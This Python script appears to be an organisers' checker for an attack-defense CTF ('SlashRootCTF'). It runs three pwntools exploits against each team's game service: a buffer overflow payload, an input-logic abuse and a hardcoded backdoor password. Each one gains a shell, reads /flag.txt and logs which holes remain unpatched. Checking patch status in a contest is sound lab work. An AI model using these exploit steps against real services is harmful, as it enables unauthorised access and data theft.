#! /usr/bin/env python3 # from pwn import context, remote from pwn import remote, context from multiprocessing import Pool from time import sleep import logging import os context.log_level = logging.ERROR INTERVAL = 60 HOST = "192.168.2.20" TOTAL_TEAMS = 10 FORMAT = "SlashRootCTF" def poc0(host, port): try: with remote(host, port) as p: p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) msg = p.recvuntil(">").decode('utf-8') # print(msg) if "young" in msg: p.sendline("y") p.recvuntil(">") p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}").decode('utf-8') # print flag if FORMAT in flag: return flag[-46:] else: return False else: return False except EOFError: return False def poc1(host, port): try: with remote(host, port) as p: p.recvuntil(">") p.sendline("Leo") p.recvuntil(">") p.sendline("y") for _ in range(2): p.recvuntil(">") p.sendline("3") p.recvuntil(">") p.sendline("0") if "Who" in p.recvuntil(">").decode('utf-8'): return False p.sendline("y") p.recvuntil(">") p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: return flag[-46:] else: return False except EOFError: return False def poc2(host, port): try: with remote(host, port) as p: p.recvuntil(">") p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") p.recvuntil(">") p.sendline("y") p.recvuntil(">") p.sendline("6") if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: return flag[-46:] else: return False else: return False except EOFError: return False def poc(host, port): with remote(host, port) as p: msg = p.recvuntil(">").decode('utf-8') if "Who" in msg: p.sendline("Leo") msg = p.recvuntil(">").decode('utf-8') if "Leo" in msg: p.sendline("Y") msg = p.recvuntil(">").decode('utf-8') if "What" in msg: return True return False def check(team): port = (60004 + (team*100)) r = poc(HOST, port) r0 = poc0(HOST, port) r1 = poc1(HOST, port) r2 = poc2(HOST, port) # r0 = False # r1 = False # r2 = False return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) def init_logging(logFileName: str, debug: bool = False): logFormatter = logging.Formatter( fmt="[%(asctime)s][%(levelname)s] %(message)s", datefmt='%d-%b-%y %H:%M:%S') rootLogger = logging.getLogger("checker") fileHandler = logging.FileHandler(logFileName) fileHandler.setFormatter(logFormatter) rootLogger.addHandler(fileHandler) consoleHandler = logging.StreamHandler() consoleHandler.setFormatter(logFormatter) rootLogger.addHandler(consoleHandler) rootLogger.setLevel(logging.DEBUG if debug else logging.INFO) return rootLogger if __name__ == "__main__": checker_logger = init_logging("checker.log") while True: with Pool(TOTAL_TEAMS) as p: results = p.map(check, range(1, TOTAL_TEAMS+1)) r0 = r1 = r2 = r3 = 0 for result in results: checker_logger.info(result) status = result.split(' ')[2:] # print(status) r0 = (r0 + 1) if status[0] != "False" else (r0) r1 = (r1 + 1) if status[1] != "False" else (r1) r2 = (r2 + 1) if status[2] != "False" else (r2) r3 = (r3 + 1) if status[3] != "False" else (r3) checker_logger.info( "Summary: {} working as expected, 1st vuln {}, 2nd vuln {}, 3rd vuln {}".format(r0, r1, r2, r3)) sleep(INTERVAL)